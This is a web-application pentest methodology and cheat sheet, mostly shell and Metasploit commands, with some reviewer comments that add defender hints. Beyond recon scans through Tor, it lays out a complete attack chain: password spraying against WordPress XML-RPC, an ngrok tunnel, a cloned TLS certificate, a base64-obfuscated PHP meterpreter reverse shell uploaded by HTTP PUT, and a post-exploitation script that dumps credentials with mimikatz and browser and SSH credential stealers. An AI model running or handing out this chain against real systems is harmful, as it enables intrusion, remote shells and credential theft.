App Platform Configuration
Check List
Methodology
TOR Technique for Finding Sensitive Routes
The following command, built on the Tor tool, creates 20 independent Tor proxies (SOCKS + control) for the debian-tor user and places them behind Privoxy so that other programs can use them. This makes it easier for an attacker to send requests to the server.
With the next command, we scan the web server to discover what features it has and obtain a list of them.
Then, using the following commands, we obtain a list of the target's subdomains, and with the HTTPX tool's command we check whether the subdomains we found are active.
We can use the next command to find the open ports of all active subdomains.
Using the Katana tool's command, we crawl all pages and find the target's endpoints and files.
Using the Katana tool's command, we crawl all the pages and find the target's endpoints and files, and then we pass the output through grep to find and display any sensitive file in the crawl output.
Then we run the Dirsearch tool's command against all the live subdomains to find sensitive paths, or even sensitive files, that could expose information about users or the web server.
Using the Nuclei command, we can scan the target for known vulnerabilities and CVEs, and with the commands that follow we can run the checks that correspond to whichever CMS the target uses.
Cheat Sheet
Sample And Known Files And Directories
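# ---- Recon cheat sheet ----
# NOTE(review): the original listing fused several commands onto shared lines
# (e.g. "privoxynikto", "alive-subdomains.txtcat", "-tglnuclei"); they are
# separated here and the intermediate file names are made consistent end to end.

# 20 Tor circuits (SOCKS from 9000, control from 9900) fronted by Privoxy.
multitor --init 20 \
  --user debian-tor \
  --socks-port 9000 \
  --control-port 9900 \
  --proxy privoxy

# Web server fingerprint / feature list.
nikto -h $WEBSITE

# Subdomain discovery, then resolution against a fixed resolver.
subfinder -d $WEBSITE -o /tmp/subdomains.txt
echo "1.1.1.1" > /tmp/resolvers.txt
shuffledns -d $WEBSITE \
  -l /tmp/subdomains.txt \
  -r /tmp/resolvers.txt \
  -mode resolve \
  -o /tmp/alive-subdomains.txt

# Probe the resolved hosts for live HTTP services.
# The original read and wrote /tmp/sub-domains.txt in the same pipeline, so the
# output redirect truncated the list before cat had read it; the input is now
# the shuffledns result. The duplicate 302 in -mc is dropped.
cat /tmp/alive-subdomains.txt | \
  httpx -silent -sc -probe -title -td -ip \
  -mc 200,404,403,302,301,303,304,305,306,307 \
  -o /tmp/sub-domains.txt

# Open web ports on the live hosts.
httpx-toolkit -l /tmp/alive-subdomains.txt \
  -ports 80,443,8080,8000,8888,8082,8083 \
  -o /tmp/alive-sub-and-ports.txt

# Crawl every live host (depth 5 plus passive sources) and keep the URL list.
# The duplicate svg in -ef is dropped.
katana -u /tmp/alive-subdomains.txt \
  -d 5 -ps \
  -pss waybackarchive,commoncrawl,alienvault \
  -kf -jc -fx \
  -ef woff,css,png,svg,jpg,woff2,jpeg,gif \
  -o /tmp/all-urls.txt

# Flag crawled URLs whose extension suggests an exposed data, backup or config file.
cat /tmp/all-urls.txt | \
  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5'

# Path brute force on the live hosts. The original had no trailing backslash
# before --random-agent, so that flag ran as a separate (failing) command.
# Server-side this is a burst of 404s from a single client or Tor exit — a
# useful detection signal for defenders.
dirsearch -l /tmp/sub-domains.txt \
  -t 150 -x 403,404,500,429 -i 200,301,302 \
  --random-agent

# Template scans: list templates, then OSINT/recon, CVEs, exposures and classic web bugs.
nuclei -tgl
nuclei -u $WEBSITE -tags osint enum recon
nuclei -u $WEBSITE -tags cves detect vulnerabilities
nuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379
nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panel
nuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserialization

# CMS-specific checks. wpscan -e takes a comma-separated list with no spaces;
# the original "-e u, m" form passes "m" as a stray positional argument.
wpscan --url $WEBSITE --rua --api-token $TOKEN
wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379
wpscan --url $WEBSITE --rua --api-token $TOKEN -e u,m
wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap,vp,p
wpscan --url $WEBSITE --rua --api-token $TOKEN -e at,vt,t
wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb,dbe,tt
joomscan -u $WEBSITE --random-agent
joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379
joomscan -u $WEBSITE --random-agent -ec
droopescan scan drupal -u $WEBSITE
droopescan scan drupal -u $WEBSITE --enumerate a
drupwn --mode exploit --target $WEBSITE
drupwn --mode enum --modules --target $WEBSITE
drupwn --mode enum --users --target $WEBSITE
# NOTE(review): split point between the spartan flags and the next command
# ("-siis_shortname_scanner" in the original) is inferred as "-s" — confirm.
spartan -u $WEBSITE --sps --users -s
iis_shortname_scanner 2 20 $WEBSITE

# ---- Comment Review ----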
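# Crawl the target and split out script and stylesheet URLs for manual review.
# The three commands were fused onto one line in the original.
katana -u $WEBSITE
katana -u $WEBSITE | grep "\.js$"
# Anchored like the .js filter; the original "\.css*" also matched ".cs"
# followed by any run of "s".
katana -u $WEBSITE | grep "\.css$"

# ---- System Configuration ----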
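# Host hardening audits: lynis on Linux hosts, hardentools on Windows hosts.
# The two tool names were fused ("lynishardentools-cli.exe") in the original.
lynis
hardentools-cli.exe

# ---- Configuration Review ----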
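# NOTE(review): consecutive commands were fused onto shared lines in the
# original (e.g. 'exit"msfconsole', '&NGINFO=', 'EOFmsfvenom'); they are
# separated here. Command text is otherwise unchanged.

# HTTP verbs the server advertises. PUT/DELETE/TRACE enabled on a production
# host is a misconfiguration worth fixing regardless of what follows.
nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

# WordPress pingback reachability through the XML-RPC endpoint.
msfconsole -qx "
use auxiliary/scanner/http/wordpress_pingback_access;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
run;
exit"

# Password spraying through the XML-RPC endpoint. Defenders: disable or
# rate-limit xmlrpc.php and alert on bursts of POST requests to it from one client.
msfconsole -qx "
use scanner/http/wordpress_xmlrpc_login;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set USERNAME admin;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;
set THREADS 10;
set STOP_ON_SUCCESS true;
set Proxies socks4:127.0.0.1:16379;
run;
exit"

# Checks whether the uploads path accepts HTTP PUT; a success here is an
# unauthenticated file write and a critical misconfiguration.
msfconsole -qx "
use auxiliary/scanner/http/http_put;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set PATH /wp-content/uploads;
run -j"

# Expose local port 4444 through an ngrok TCP tunnel and read back the public
# host/port from ngrok's local API. Outbound connections from a web server to
# *.tcp.ngrok.io are a strong indicator for defenders.
ngrok tcp 4444 >/dev/null 2>&1 &
NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

# Clone a public site's certificate for the handler. The rm wipes the whole
# loot directory so that find picks up only the fresh .pem — destructive if
# anything else is stored there.
rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"
CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

# Resource script the handler runs automatically when a session opens.
# Every line here is a credential-harvesting step; on the defending side these
# map to LSASS access and browser/SSH credential-store reads.
cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

# Staged PHP payload pointed at the tunnel, base64-encoded in three passes and
# re-wrapped in PHP tags by the two sed calls.
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=$NGHOST \
  PORT=$NGPORT \
  HandlerSSLCert=$CERT \
  StagerVerifySSLCert=true \
  PayloadUUIDTracking=true \
  PayloadUUIDName=StagedPHP \
  EnableStageEncoding=true \
  -f raw \
  -e php/base64 \
  -i 3 \
  -o /tmp/unk9vvn.php; \
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php; \
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

# Handler bound on 127.0.0.1:4444 behind the ngrok tunnel, using the cloned cert.
msfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"

# Upload via HTTP PUT into the uploads path found writable above.
curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.php

# ---- Logging ----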
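# Command-injection testing of the target's parameters ("Last updated" page
# chrome was fused onto this line in the original).
commix -u $WEBSITE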